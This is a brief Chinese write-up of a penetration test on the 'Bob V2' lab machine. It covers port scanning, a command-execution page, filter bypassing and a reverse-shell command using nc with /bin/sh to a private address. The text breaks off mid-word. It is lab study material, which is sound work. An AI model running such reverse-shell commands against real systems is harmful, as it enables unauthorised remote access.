滲透測試之BobV2

Nmap端口掃描: 發現robots.txt Login.php不存在,其他的頁面也沒有什麼用 發現一個可以執行命令的頁面: Ls命令估計被過濾了: 又學一個:lsattr查看文件屬性 發現有一個備份文件:存在兩處過濾,無法使用nc反彈shell,使用下面的命令反彈成功。(bash反彈失敗) 反彈shell:/bin/nc -e /bin/sh 10.1.1.1 1234 美化shell:Pyth
相關文章
相關標籤/搜索